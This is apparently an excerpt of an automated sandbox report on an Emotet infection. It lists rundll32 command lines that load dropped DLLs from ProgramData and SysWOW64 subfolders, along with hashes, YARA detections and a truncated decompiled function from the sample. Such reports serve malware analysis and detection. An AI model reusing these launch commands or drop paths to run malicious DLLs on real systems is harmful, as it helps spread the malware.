                                                                                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Target ID:9
                                                                                                                                Start time:20:39:34
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Target ID:10
                                                                                                                                Start time:20:39:38
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Target ID:11
                                                                                                                                Start time:20:39:58
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Target ID:12
                                                                                                                                Start time:20:40:02
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Target ID:15
                                                                                                                                Start time:20:40:22
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                                Target ID:16
                                                                                                                                Start time:20:40:26
                                                                                                                                Start date:28/01/2022
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:44544 bytes
                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420155080.00000000032F1000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 251a07875837724f5a5292df2b7b9bc7481d0cb7347cf4fa69627356d27410bd
                                                                                                                                  • Instruction ID: 0826abf7d0197d298d7a94908d87c13558ec382c17628834ea982b5bc4d8009e
                                                                                                                                  • Opcode Fuzzy Hash: 251a07875837724f5a5292df2b7b9bc7481d0cb7347cf4fa69627356d27410bd
                                                                                                                                  • Instruction Fuzzy Hash: DDD1262062CB498FCB59DB2C8054620FBE1FF5E348B5849BEE58ECB296D624DCD1C395
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420155080.00000000032F1000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                  • Associated: 00000004.00000003.420105332.00000000032F0000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a919fc72fcc4e118e760d7880dccbdf122af8d4252314851a380f81ce9847186
                                                                                                                                  • Instruction ID: 0826abf7d0197d298d7a94908d87c13558ec382c17628834ea982b5bc4d8009e
                                                                                                                                  • Opcode Fuzzy Hash: a919fc72fcc4e118e760d7880dccbdf122af8d4252314851a380f81ce9847186
                                                                                                                                  • Instruction Fuzzy Hash: DDD1262062CB498FCB59DB2C8054620FBE1FF5E348B5849BEE58ECB296D624DCD1C395
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                  • Associated: 00000004.00000003.420105332.00000000032F0000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction ID: 34441f809d99657970ac4b97ed697120d760a86570f8913d3df47bbd29e64caa
                                                                                                                                  • Opcode Fuzzy Hash: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction Fuzzy Hash: 4D51D62072CA484FCB48EF1C8855A31F7D1FB5D700B4984FEE68AC7292DA24CCD58795
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction ID: 34441f809d99657970ac4b97ed697120d760a86570f8913d3df47bbd29e64caa
                                                                                                                                  • Opcode Fuzzy Hash: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction Fuzzy Hash: 4D51D62072CA484FCB48EF1C8855A31F7D1FB5D700B4984FEE68AC7292DA24CCD58795
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                  • Associated: 00000004.00000003.420105332.00000000032F0000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction ID: 81e5fd303f9267598110430094e09b4fc0c196b9e48a312f389b92d135076b5b
                                                                                                                                  • Opcode Fuzzy Hash: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction Fuzzy Hash: CDD022A211C3C51FC322F2B9081906D7B90DD1618832900CB8A8BCF082C8968CC24322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction ID: 81e5fd303f9267598110430094e09b4fc0c196b9e48a312f389b92d135076b5b
                                                                                                                                  • Opcode Fuzzy Hash: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction Fuzzy Hash: CDD022A211C3C51FC322F2B9081906D7B90DD1618832900CB8A8BCF082C8968CC24322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683294083.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 03ada217cc85396ad92bdce512c92f2ef59b762858a50d4c708783a3872caf13
                                                                                                                                  • Instruction ID: 9a76010e0533b9f9d4f1147c3aa874bf602ff4e82b5fbd4b11e9c003934484dd
                                                                                                                                  • Opcode Fuzzy Hash: 03ada217cc85396ad92bdce512c92f2ef59b762858a50d4c708783a3872caf13
                                                                                                                                  • Instruction Fuzzy Hash: 2971A611A0EBC64FE71357786C657A27FB09F17210B0E01EBE488CB0E3D9489989C362
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683294083.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b872ff5d8e320beff945d7ff078fcb637f60cf064f18bc4ed49a2fca04c40320
                                                                                                                                  • Instruction ID: a124356133797467016251b4128d1cd63680e12c6d99e9a6167872a1ea0cb72f
                                                                                                                                  • Opcode Fuzzy Hash: b872ff5d8e320beff945d7ff078fcb637f60cf064f18bc4ed49a2fca04c40320
                                                                                                                                  • Instruction Fuzzy Hash: F831202191E7C24FE713577858AA6A07FB09F17210B1E04EBD088CF0B3E95C898AD322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:16.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                  Signature Coverage:21.9%
                                                                                                                                  Total number of Nodes:297
                                                                                                                                  Total number of Limit Nodes:23

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				short _v22;
                                                                                                                                  				short _v24;
                                                                                                                                  				short _v26;
                                                                                                                                  				short _v28;
                                                                                                                                  				short _v30;
                                                                                                                                  				short _v32;
                                                                                                                                  				short _v34;
                                                                                                                                  				short _v36;
                                                                                                                                  				short _v38;
                                                                                                                                  				char _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void* _v48;
                                                                                                                                  				long _v52;
                                                                                                                                  				void* _v56;
                                                                                                                                  				struct HRSRC__* _v60;
                                                                                                                                  				short _v64;
                                                                                                                                  				short _v66;
                                                                                                                                  				short _v68;
                                                                                                                                  				short _v70;
                                                                                                                                  				short _v72;
                                                                                                                                  				short _v74;
                                                                                                                                  				short _v76;
                                                                                                                                  				short _v78;
                                                                                                                                  				short _v80;
                                                                                                                                  				short _v82;
                                                                                                                                  				short _v84;
                                                                                                                                  				short _v86;
                                                                                                                                  				char _v88;
                                                                                                                                  				intOrPtr _v92;
                                                                                                                                  				void* __ebp;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				void* _t70;
                                                                                                                                  				void* _t72;
                                                                                                                                  				struct HRSRC__* _t74;
                                                                                                                                  				void* _t78;
                                                                                                                                  				intOrPtr _t92;
                                                                                                                                  				void* _t93;
                                                                                                                                  				void* _t95;
                                                                                                                                  				intOrPtr _t104;
                                                                                                                                  				signed int _t120;
                                                                                                                                  				void* _t121;
                                                                                                                                  
                                                                                                                                  				_t119 = __esi;
                                                                                                                                  				_t118 = __edi;
                                                                                                                                  				_t96 = __ebx;
                                                                                                                                  				_t66 =  *0x100545cc; // 0x4cc2cb6b
                                                                                                                                  				_v20 = _t66 ^ _t120;
                                                                                                                                  				_v92 = _a8;
                                                                                                                                  				 *0x10055a80 = _a4;
                                                                                                                                  				_t109 = _a8;
                                                                                                                                  				 *0x10055a84 = _a8;
                                                                                                                                  				 *0x10055a88 = _a12;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v52 = 0;
                                                                                                                                  				_v44 = 0;
                                                                                                                                  				_v48 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t70 = E10006A90(__eflags); // executed
